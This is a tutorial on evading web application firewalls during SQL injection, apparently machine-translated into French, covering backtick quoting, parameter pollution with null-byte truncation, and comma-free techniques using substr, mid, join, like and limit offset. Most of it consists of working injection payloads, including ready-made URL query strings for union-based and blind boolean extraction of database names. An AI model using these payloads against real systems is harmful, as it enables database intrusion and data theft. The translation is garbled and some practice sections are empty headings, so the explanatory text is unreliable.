Un.、Contournement des guillemets inversés

In mysql Peut être utilisé `Voici les guillemets inverses` Contourner un peu waf Interception.Les champs peuvent être cités à l'envers ou non,Même sens.
insert into users(username,password,email)values('test','123456','[email protected]');
insert into users(`username`,`password`,`email`)values('test','123456','[email protected]');

\N'union distinct select 1,(select version() from `users` limit 1)--+&submit=1

2.、Les fonctions de langage de script contournent

1、Introduction

In php Dans la langue,id=1&id=2 Les valeurs suivantes écrasent automatiquement les valeurs précédentes,Différentes langues ont des caractéristiques différentes.Vous pouvez l'utiliser pour contourner certains waf Interception.
id=1%00&id=2 union select 1,2,3
Certains waf Va correspondre au premier id Paramètres1%00, %00 C'est un caractère tronqué,waf Sera automatiquement tronqué Pour ne pas détecter ce qui suit.Dans le programme.,id Est égal à id=2 union select 1,2,3  Interception par injection de contournement .
Autres caractéristiques linguistiques

2、Pratique.1

3、Pratique.2

?name=vince%00&name=' union select 1,database()--+&submit=1

Trois、 Contournement des virgules

 Certains scripts anti - injection sont actuellement interceptés par des virgules , Par exemple, l'injection régulière doit contenir une virgule .
select * from users where id=1 union select 1,2,3,4;
 Les virgules sont généralement filtrées en blanc ,select * from users where id=1 union select 1 2 3 4;Voilà.SQL  L'instruction va mal tourner .Alors..., Peut être fait sans virgule  SQL Injection.
 Les méthodes de contournement sont les suivantes ：

1、La première façon：substr Tronquer une chaîne

 Interroger le premier caractère de la Bibliothèque actuelle ：
select(substr(database() from 1 for 1)); 
Requête p égal à select(substr(database() from 1 for 1)),Retour à la normale.
select * from users where id=1 and 'p'=(select(substr(database() from 1 for 1)));
Peut être optimisé davantage m Remplacer par hex 0x6D, Cela évite les guillemets simples .
select * from users where id=1 and 0x70=(select(substr(database() from 1 for 1)));

?name=vince' and (select(substr(database() from 1 for 1)))='p'--+&submit=1 ?name=vince' and (select(substr(database() from 1 for 1)))='x'--+&submit=1

2、La deuxième façon：mid Tronquer une chaîne

C'est min La fonction suit substr La fonction fonctionne de la même façon,Si substr  Cette fonction peut être utilisée au lieu de .
select (mid(database() from 1 for 1)); 
select * from users where id=1 and 'p'=(select(mid(database() from 1 for 1)));
select * from users where id=1 and 0x70=(select(mid(database() from 1 for 1)));

3、La troisième façon： Utiliser join Contournement

Utiliser join  Auto - connexion de deux tables ：
union select 1,2 #Équivalent à union select * from (select 1)a join (select 2)b,Parmi euxa Et b Alias de la table.
select * from users where id=-1 union select 1,2,3,4;
select * from users where id=-1 union select * from (select 1)a join (select 2)b
join(select 3)c join(select 4)d;
select * from users where id=-1 union select * from (select 1)a join (select 2)b
join(select user())c join(select 4)d;
 Il n'y a pas de virgule ici non plus ,Pour contourner waf  Interception des virgules .

4、La quatrième voie：like Contournement

Utiliser like Requête floue select user() like '%r%'; Requête floue retournée avec succès 1,Sinon, retournez à 0
Après avoir trouvé le premier caractère, passez à la correspondance suivante.Pour trouver toutes les chaînes,Enfin, le contenu à interroger,Ce genre de SQL Il n'y aura pas non plus de virgule dans l'instruction d'injection.Pour contourner waf Interception.

5、La Cinquième façon：limit offset Contournement

SQL Au moment de l'injection,Si vous avez besoin d'une entrée qualifiée, vous pouvez utiliser limit 0,1  Limiter le nombre d'entrées retournées ,limit 0,1  Retour à un enregistrement .Si vous interceptez une virgule,Peut être utilisé limit 1 La valeur par défaut renvoie les premières données.Peut également être utilisé limit 1 offset 0 Retour au premier enregistrement à partir de zéro,Ça contourne. waf Interception.